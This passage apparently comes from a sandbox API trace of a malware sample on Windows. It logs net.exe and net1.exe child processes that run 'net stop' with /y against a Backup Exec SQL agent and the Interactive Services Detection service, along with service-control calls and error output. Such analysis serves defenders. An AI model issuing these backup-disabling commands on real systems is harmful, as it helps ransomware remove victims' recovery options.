"0xab4" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$BKUPEXEC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 362 os_tid = 0xb68 [0202.176] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x27fad8 | out: lpSystemTimeAsFileTime=0x27fad8*(dwLowDateTime=0x41b164c0, dwHighDateTime=0x1d57a87)) [0202.176] GetCurrentProcessId () returned 0xb64 [0202.176] GetCurrentThreadId () returned 0xb68 [0202.176] GetTickCount () returned 0x116c2d3 [0202.176] QueryPerformanceCounter (in: lpPerformanceCount=0x27fad0 | out: lpPerformanceCount=0x27fad0*=32246096711) returned 1 [0202.177] GetModuleHandleA (lpModuleName=0x0) returned 0xf70000 [0202.177] __set_app_type (_Type=0x1) [0202.177] __p__fmode () returned 0x74eb31f4 [0202.177] __p__commode () returned 0x74eb31fc [0202.177] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf7ffe6) returned 0x0 [0202.177] __getmainargs (in: _Argc=0xf89064, _Argv=0xf8906c, _Env=0xf89068, _DoWildCard=0, _StartInfo=0xf89024 | out: _Argc=0xf89064, _Argv=0xf8906c, _Env=0xf89068) returned 0 [0202.177] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.177] GetConsoleOutputCP () returned 0x1b5 [0202.177] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf89080 | out: lpCPInfo=0xf89080) returned 1 [0202.177] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.180] sprintf_s (in: _DstBuf=0x27fa90, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0202.181] setlocale (category=0, locale=".437") returned="English_United States.437" [0202.182] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0202.182] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0202.182] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$BKUPEXEC /y" [0202.182] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x27f85c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0202.182] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x76) returned 0x4af788 [0202.183] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0202.183] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x27fa60 | out: Buffer=0x27fa60*=0x4b1c78) returned 0x0 [0202.183] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x27fa60 | out: Buffer=0x27fa60*=0x4b1c90) returned 0x0 [0202.183] _fileno (_File=0x74eb2900) returned -2 [0202.183] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0202.183] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0202.183] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0202.183] _wcsicmp (_String1="config", _String2="stop") returned -16 [0202.183] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0202.183] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0202.183] _wcsicmp (_String1="file", _String2="stop") returned -13 [0202.183] _wcsicmp (_String1="files", _String2="stop") returned -13 [0202.183] _wcsicmp (_String1="group", _String2="stop") returned -12 [0202.183] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0202.183] _wcsicmp (_String1="help", _String2="stop") returned -11 [0202.183] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0202.183] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0202.183] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0202.183] _wcsicmp (_String1="session", _String2="stop") returned -15 [0202.183] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0202.183] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0202.184] _wcsicmp (_String1="share", _String2="stop") returned -12 [0202.184] _wcsicmp (_String1="start", _String2="stop") returned -14 [0202.184] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0202.184] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0202.184] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0202.184] _wcsicmp (_String1="accounts", _String2="SQLAgent$BKUPEXEC") returned -18 [0202.184] _wcsicmp (_String1="computer", _String2="SQLAgent$BKUPEXEC") returned -16 [0202.184] _wcsicmp (_String1="config", _String2="SQLAgent$BKUPEXEC") returned -16 [0202.184] _wcsicmp (_String1="continue", _String2="SQLAgent$BKUPEXEC") returned -16 [0202.184] _wcsicmp (_String1="cont", _String2="SQLAgent$BKUPEXEC") returned -16 [0202.184] _wcsicmp (_String1="file", _String2="SQLAgent$BKUPEXEC") returned -13 [0202.184] _wcsicmp (_String1="files", _String2="SQLAgent$BKUPEXEC") returned -13 [0202.184] _wcsicmp (_String1="group", _String2="SQLAgent$BKUPEXEC") returned -12 [0202.184] _wcsicmp (_String1="groups", _String2="SQLAgent$BKUPEXEC") returned -12 [0202.184] _wcsicmp (_String1="help", _String2="SQLAgent$BKUPEXEC") returned -11 [0202.184] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$BKUPEXEC") returned -11 [0202.184] _wcsicmp (_String1="localgroup", _String2="SQLAgent$BKUPEXEC") returned -7 [0202.184] _wcsicmp (_String1="pause", _String2="SQLAgent$BKUPEXEC") returned -3 [0202.184] _wcsicmp (_String1="session", _String2="SQLAgent$BKUPEXEC") returned -12 [0202.184] _wcsicmp (_String1="sessions", _String2="SQLAgent$BKUPEXEC") returned -12 [0202.184] _wcsicmp (_String1="sess", _String2="SQLAgent$BKUPEXEC") returned -12 [0202.184] _wcsicmp (_String1="share", _String2="SQLAgent$BKUPEXEC") returned -9 [0202.184] _wcsicmp (_String1="start", _String2="SQLAgent$BKUPEXEC") returned 3 [0202.184] _wcsicmp (_String1="stats", _String2="SQLAgent$BKUPEXEC") returned 3 [0202.184] _wcsicmp (_String1="statistics", _String2="SQLAgent$BKUPEXEC") returned 3 [0202.184] _wcsicmp (_String1="stop", _String2="SQLAgent$BKUPEXEC") returned 3 [0202.184] _wcsicmp (_String1="time", _String2="SQLAgent$BKUPEXEC") returned 1 [0202.184] _wcsicmp (_String1="user", _String2="SQLAgent$BKUPEXEC") returned 2 [0202.184] _wcsicmp (_String1="users", _String2="SQLAgent$BKUPEXEC") returned 2 [0202.184] _wcsicmp (_String1="msg", _String2="SQLAgent$BKUPEXEC") returned -6 [0202.184] _wcsicmp (_String1="messenger", _String2="SQLAgent$BKUPEXEC") returned -6 [0202.184] _wcsicmp (_String1="receiver", _String2="SQLAgent$BKUPEXEC") returned -1 [0202.184] _wcsicmp (_String1="rcv", _String2="SQLAgent$BKUPEXEC") returned -1 [0202.184] _wcsicmp (_String1="netpopup", _String2="SQLAgent$BKUPEXEC") returned -5 [0202.184] _wcsicmp (_String1="redirector", _String2="SQLAgent$BKUPEXEC") returned -1 [0202.184] _wcsicmp (_String1="redir", _String2="SQLAgent$BKUPEXEC") returned -1 [0202.184] _wcsicmp (_String1="rdr", _String2="SQLAgent$BKUPEXEC") returned -1 [0202.185] _wcsicmp (_String1="workstation", _String2="SQLAgent$BKUPEXEC") returned 4 [0202.185] _wcsicmp (_String1="work", _String2="SQLAgent$BKUPEXEC") returned 4 [0202.185] _wcsicmp (_String1="wksta", _String2="SQLAgent$BKUPEXEC") returned 4 [0202.185] _wcsicmp (_String1="prdr", _String2="SQLAgent$BKUPEXEC") returned -3 [0202.185] _wcsicmp (_String1="devrdr", _String2="SQLAgent$BKUPEXEC") returned -15 [0202.185] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$BKUPEXEC") returned -7 [0202.185] _wcsicmp (_String1="server", _String2="SQLAgent$BKUPEXEC") returned -12 [0202.185] _wcsicmp (_String1="svr", _String2="SQLAgent$BKUPEXEC") returned 5 [0202.185] _wcsicmp (_String1="srv", _String2="SQLAgent$BKUPEXEC") returned 1 [0202.185] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$BKUPEXEC") returned -7 [0202.185] _wcsicmp (_String1="alerter", _String2="SQLAgent$BKUPEXEC") returned -18 [0202.185] _wcsicmp (_String1="netlogon", _String2="SQLAgent$BKUPEXEC") returned -5 [0202.185] _wcsupr (in: _String="SQLAgent$BKUPEXEC" | out: _String="SQLAGENT$BKUPEXEC") returned="SQLAGENT$BKUPEXEC" [0202.185] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4b5460 [0202.188] GetServiceKeyNameW (in: hSCManager=0x4b5460, lpDisplayName="SQLAGENT$BKUPEXEC", lpServiceName=0xf8aaf0, lpcchBuffer=0x27f9fc | out: lpServiceName="", lpcchBuffer=0x27f9fc) returned 0 [0202.188] _wcsicmp (_String1="msg", _String2="SQLAGENT$BKUPEXEC") returned -6 [0202.188] _wcsicmp (_String1="messenger", _String2="SQLAGENT$BKUPEXEC") returned -6 [0202.188] _wcsicmp (_String1="receiver", _String2="SQLAGENT$BKUPEXEC") returned -1 [0202.188] _wcsicmp (_String1="rcv", _String2="SQLAGENT$BKUPEXEC") returned -1 [0202.188] _wcsicmp (_String1="redirector", _String2="SQLAGENT$BKUPEXEC") returned -1 [0202.188] _wcsicmp (_String1="redir", _String2="SQLAGENT$BKUPEXEC") returned -1 [0202.188] _wcsicmp (_String1="rdr", _String2="SQLAGENT$BKUPEXEC") returned -1 [0202.188] _wcsicmp (_String1="workstation", _String2="SQLAGENT$BKUPEXEC") returned 4 [0202.188] _wcsicmp (_String1="work", _String2="SQLAGENT$BKUPEXEC") returned 4 [0202.188] _wcsicmp (_String1="wksta", _String2="SQLAGENT$BKUPEXEC") returned 4 [0202.188] _wcsicmp (_String1="prdr", _String2="SQLAGENT$BKUPEXEC") returned -3 [0202.188] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$BKUPEXEC") returned -15 [0202.188] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$BKUPEXEC") returned -7 [0202.188] _wcsicmp (_String1="server", _String2="SQLAGENT$BKUPEXEC") returned -12 [0202.188] _wcsicmp (_String1="svr", _String2="SQLAGENT$BKUPEXEC") returned 5 [0202.189] _wcsicmp (_String1="srv", _String2="SQLAGENT$BKUPEXEC") returned 1 [0202.189] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$BKUPEXEC") returned -7 [0202.189] _wcsicmp (_String1="alerter", _String2="SQLAGENT$BKUPEXEC") returned -18 [0202.189] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$BKUPEXEC") returned -5 [0202.189] NetServiceControl (in: servername=0x0, service="SQLAGENT$BKUPEXEC", opcode=0x0, arg=0x0, bufptr=0x27f9f8 | out: bufptr=0x27f9f8) returned 0x889 [0202.190] wcscpy_s (in: _Destination=0xf8a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0202.190] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0202.190] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xf8b338, nSize=0x800, Arguments=0xf89dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0202.191] GetFileType (hFile=0x26c) returned 0x3 [0202.191] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x4b3f90 [0202.191] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x4b3f90, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0202.191] WriteFile (in: hFile=0x26c, lpBuffer=0x4b3f90, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x27f938, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x27f938, lpOverlapped=0x0) returned 0 [0202.191] LocalFree (hMem=0x4b3f90) returned 0x0 [0202.191] GetFileType (hFile=0x26c) returned 0x3 [0202.192] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4b6238 [0202.192] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4b6238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nK", lpUsedDefaultChar=0x0) returned 2 [0202.192] WriteFile (in: hFile=0x26c, lpBuffer=0x4b6238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x27f938, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x27f938, lpOverlapped=0x0) returned 0 [0202.192] LocalFree (hMem=0x4b6238) returned 0x0 [0202.192] _ultow (in: _Dest=0x889, _Radix=2619752 | out: _Dest=0x889) returned="2185" [0202.192] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xf8b338, nSize=0x800, Arguments=0xf89dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0202.192] GetFileType (hFile=0x26c) returned 0x3 [0202.192] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x4b6238 [0202.192] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x4b6238, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0202.192] WriteFile (in: hFile=0x26c, lpBuffer=0x4b6238, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x27f944, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x27f944, lpOverlapped=0x0) returned 0 [0202.192] LocalFree (hMem=0x4b6238) returned 0x0 [0202.192] GetFileType (hFile=0x26c) returned 0x3 [0202.192] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4b6238 [0202.192] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4b6238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nK", lpUsedDefaultChar=0x0) returned 2 [0202.192] WriteFile (in: hFile=0x26c, lpBuffer=0x4b6238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x27f944, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x27f944, lpOverlapped=0x0) returned 0 [0202.192] LocalFree (hMem=0x4b6238) returned 0x0 [0202.193] NetApiBufferFree (Buffer=0x4b1c78) returned 0x0 [0202.193] NetApiBufferFree (Buffer=0x4b1c90) returned 0x0 [0202.193] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$BKUPEXEC /y" [0202.193] exit (_Code=2) Process: id = "190" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1d59f000" os_pid = "0xb54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop UI0Detect /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 363 os_tid = 0xb60 Process: id = "191" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x7b235000" os_pid = "0xb88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "190" os_parent_pid = "0xb54" cmd_line = "C:\\Windows\\system32\\net1 stop UI0Detect /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 364 os_tid = 0xb44 [0202.340] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x25ff40 | out: lpSystemTimeAsFileTime=0x25ff40*(dwLowDateTime=0x41cb93e0, dwHighDateTime=0x1d57a87)) [0202.340] GetCurrentProcessId () returned 0xb88 [0202.340] GetCurrentThreadId () returned 0xb44 [0202.340] GetTickCount () returned 0x116c37e [0202.340] QueryPerformanceCounter (in: lpPerformanceCount=0x25ff38 | out: lpPerformanceCount=0x25ff38*=32262504297) returned 1 [0202.341] GetModuleHandleA (lpModuleName=0x0) returned 0x470000 [0202.341] __set_app_type (_Type=0x1) [0202.341] __p__fmode () returned 0x74eb31f4 [0202.341] __p__commode () returned 0x74eb31fc [0202.341] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x47ffe6) returned 0x0 [0202.341] __getmainargs (in: _Argc=0x489064, _Argv=0x48906c, _Env=0x489068, _DoWildCard=0, _StartInfo=0x489024 | out: _Argc=0x489064, _Argv=0x48906c, _Env=0x489068) returned 0 [0202.341] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.341] GetConsoleOutputCP () returned 0x1b5 [0202.341] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x489080 | out: lpCPInfo=0x489080) returned 1 [0202.341] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.345] sprintf_s (in: _DstBuf=0x25fef8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0202.345] setlocale (category=0, locale=".437") returned="English_United States.437" [0202.347] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0202.347] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0202.347] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop UI0Detect /y" [0202.347] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x25fcc4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0202.347] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x66) returned 0x303c00 [0202.347] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0202.347] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x25fec8 | out: Buffer=0x25fec8*=0x301c60) returned 0x0 [0202.347] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x25fec8 | out: Buffer=0x25fec8*=0x301c78) returned 0x0 [0202.347] _fileno (_File=0x74eb2900) returned -2 [0202.347] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0202.347] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0202.347] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0202.347] _wcsicmp (_String1="config", _String2="stop") returned -16 [0202.347] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0202.347] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0202.347] _wcsicmp (_String1="file", _String2="stop") returned -13 [0202.348] _wcsicmp (_String1="files", _String2="stop") returned -13 [0202.348] _wcsicmp (_String1="group", _String2="stop") returned -12 [0202.348] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0202.348] _wcsicmp (_String1="help", _String2="stop") returned -11 [0202.348] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0202.348] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0202.348] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0202.348] _wcsicmp (_String1="session", _String2="stop") returned -15 [0202.348] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0202.348] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0202.348] _wcsicmp (_String1="share", _String2="stop") returned -12 [0202.348] _wcsicmp (_String1="start", _String2="stop") returned -14 [0202.348] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0202.348] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0202.348] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0202.348] _wcsicmp (_String1="accounts", _String2="UI0Detect") returned -20 [0202.348] _wcsicmp (_String1="computer", _String2="UI0Detect") returned -18 [0202.348] _wcsicmp (_String1="config", _String2="UI0Detect") returned -18 [0202.348] _wcsicmp (_String1="continue", _String2="UI0Detect") returned -18 [0202.348] _wcsicmp (_String1="cont", _String2="UI0Detect") returned -18 [0202.348] _wcsicmp (_String1="file", _String2="UI0Detect") returned -15 [0202.348] _wcsicmp (_String1="files", _String2="UI0Detect") returned -15 [0202.348] _wcsicmp (_String1="group", _String2="UI0Detect") returned -14 [0202.348] _wcsicmp (_String1="groups", _String2="UI0Detect") returned -14 [0202.348] _wcsicmp (_String1="help", _String2="UI0Detect") returned -13 [0202.348] _wcsicmp (_String1="helpmsg", _String2="UI0Detect") returned -13 [0202.348] _wcsicmp (_String1="localgroup", _String2="UI0Detect") returned -9 [0202.348] _wcsicmp (_String1="pause", _String2="UI0Detect") returned -5 [0202.348] _wcsicmp (_String1="session", _String2="UI0Detect") returned -2 [0202.348] _wcsicmp (_String1="sessions", _String2="UI0Detect") returned -2 [0202.348] _wcsicmp (_String1="sess", _String2="UI0Detect") returned -2 [0202.348] _wcsicmp (_String1="share", _String2="UI0Detect") returned -2 [0202.348] _wcsicmp (_String1="start", _String2="UI0Detect") returned -2 [0202.348] _wcsicmp (_String1="stats", _String2="UI0Detect") returned -2 [0202.348] _wcsicmp (_String1="statistics", _String2="UI0Detect") returned -2 [0202.348] _wcsicmp (_String1="stop", _String2="UI0Detect") returned -2 [0202.348] _wcsicmp (_String1="time", _String2="UI0Detect") returned -1 [0202.349] _wcsicmp (_String1="user", _String2="UI0Detect") returned 10 [0202.349] _wcsicmp (_String1="users", _String2="UI0Detect") returned 10 [0202.349] _wcsicmp (_String1="msg", _String2="UI0Detect") returned -8 [0202.349] _wcsicmp (_String1="messenger", _String2="UI0Detect") returned -8 [0202.349] _wcsicmp (_String1="receiver", _String2="UI0Detect") returned -3 [0202.349] _wcsicmp (_String1="rcv", _String2="UI0Detect") returned -3 [0202.349] _wcsicmp (_String1="netpopup", _String2="UI0Detect") returned -7 [0202.349] _wcsicmp (_String1="redirector", _String2="UI0Detect") returned -3 [0202.349] _wcsicmp (_String1="redir", _String2="UI0Detect") returned -3 [0202.349] _wcsicmp (_String1="rdr", _String2="UI0Detect") returned -3 [0202.349] _wcsicmp (_String1="workstation", _String2="UI0Detect") returned 2 [0202.349] _wcsicmp (_String1="work", _String2="UI0Detect") returned 2 [0202.349] _wcsicmp (_String1="wksta", _String2="UI0Detect") returned 2 [0202.349] _wcsicmp (_String1="prdr", _String2="UI0Detect") returned -5 [0202.349] _wcsicmp (_String1="devrdr", _String2="UI0Detect") returned -17 [0202.349] _wcsicmp (_String1="lanmanworkstation", _String2="UI0Detect") returned -9 [0202.349] _wcsicmp (_String1="server", _String2="UI0Detect") returned -2 [0202.349] _wcsicmp (_String1="svr", _String2="UI0Detect") returned -2 [0202.349] _wcsicmp (_String1="srv", _String2="UI0Detect") returned -2 [0202.349] _wcsicmp (_String1="lanmanserver", _String2="UI0Detect") returned -9 [0202.349] _wcsicmp (_String1="alerter", _String2="UI0Detect") returned -20 [0202.349] _wcsicmp (_String1="netlogon", _String2="UI0Detect") returned -7 [0202.349] _wcsupr (in: _String="UI0Detect" | out: _String="UI0DETECT") returned="UI0DETECT" [0202.349] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3054b8 [0202.352] GetServiceKeyNameW (in: hSCManager=0x3054b8, lpDisplayName="UI0DETECT", lpServiceName=0x48aaf0, lpcchBuffer=0x25fe64 | out: lpServiceName="", lpcchBuffer=0x25fe64) returned 0 [0202.352] _wcsicmp (_String1="msg", _String2="UI0DETECT") returned -8 [0202.352] _wcsicmp (_String1="messenger", _String2="UI0DETECT") returned -8 [0202.352] _wcsicmp (_String1="receiver", _String2="UI0DETECT") returned -3 [0202.352] _wcsicmp (_String1="rcv", _String2="UI0DETECT") returned -3 [0202.353] _wcsicmp (_String1="redirector", _String2="UI0DETECT") returned -3 [0202.353] _wcsicmp (_String1="redir", _String2="UI0DETECT") returned -3 [0202.353] _wcsicmp (_String1="rdr", _String2="UI0DETECT") returned -3 [0202.353] _wcsicmp (_String1="workstation", _String2="UI0DETECT") returned 2 [0202.353] _wcsicmp (_String1="work", _String2="UI0DETECT") returned 2 [0202.353] _wcsicmp (_String1="wksta", _String2="UI0DETECT") returned 2 [0202.353] _wcsicmp (_String1="prdr", _String2="UI0DETECT") returned -5 [0202.353] _wcsicmp (_String1="devrdr", _String2="UI0DETECT") returned -17 [0202.353] _wcsicmp (_String1="lanmanworkstation", _String2="UI0DETECT") returned -9 [0202.353] _wcsicmp (_String1="server", _String2="UI0DETECT") returned -2 [0202.353] _wcsicmp (_String1="svr", _String2="UI0DETECT") returned -2 [0202.353] _wcsicmp (_String1="srv", _String2="UI0DETECT") returned -2 [0202.353] _wcsicmp (_String1="lanmanserver", _String2="UI0DETECT") returned -9 [0202.353] _wcsicmp (_String1="alerter", _String2="UI0DETECT") returned -20 [0202.353] _wcsicmp (_String1="netlogon", _String2="UI0DETECT") returned -7 [0202.353] NetServiceControl (in: servername=0x0, service="UI0DETECT", opcode=0x0, arg=0x0, bufptr=0x25fe60 | out: bufptr=0x25fe60) returned 0x0 [0202.354] NetApiBufferAllocate (in: ByteCount=0xfa0, Buffer=0x25fe3c | out: Buffer=0x25fe3c*=0x307868) returned 0x0 [0202.354] OpenServiceW (hSCManager=0x3054b8, lpServiceName="UI0DETECT", dwDesiredAccess=0xc) returned 0x3055d0 [0202.354] QueryServiceStatus (in: hService=0x3055d0, lpServiceStatus=0x25fe10 | out: lpServiceStatus=0x25fe10*(dwServiceType=0x110, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0202.355] GetServiceDisplayNameW (in: hSCManager=0x3054b8, lpServiceName="UI0DETECT", lpDisplayName=0x491fc0, lpcchBuffer=0x25fdf4 | out: lpDisplayName="Interactive Services Detection", lpcchBuffer=0x25fdf4) returned 1 [0202.355] NetApiBufferFree (Buffer=0x307868) returned 0x0 [0202.355] CloseServiceHandle (hSCObject=0x3055d0) returned 1 [0202.355] wcscpy_s (in: _Destination=0x48a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0202.355] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0202.356] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdc1, dwLanguageId=0x0, lpBuffer=0x48b338, nSize=0x800, Arguments=0x489dd8 | out: lpBuffer="The Interactive Services Detection service is not started.\r\n") returned 0x3c [0202.357] GetFileType (hFile=0x26c) returned 0x3 [0202.357] LocalAlloc (uFlags=0x0, uBytes=0x78) returned 0x2ff7f0 [0202.357] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The Interactive Services Detection service is not started.\r\n", cchWideChar=60, lpMultiByteStr=0x2ff7f0, cbMultiByte=120, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The Interactive Services Detection service is not started.\r\n", lpUsedDefaultChar=0x0) returned 60 [0202.357] WriteFile (in: hFile=0x26c, lpBuffer=0x2ff7f0, nNumberOfBytesToWrite=0x3c, lpNumberOfBytesWritten=0x25fd64, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x25fd64, lpOverlapped=0x0) returned 0 [0202.357] LocalFree (hMem=0x2ff7f0) returned 0x0 [0202.357] GetFileType (hFile=0x26c) returned 0x3 [0202.357] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x306270 [0202.357] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x306270, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n0", 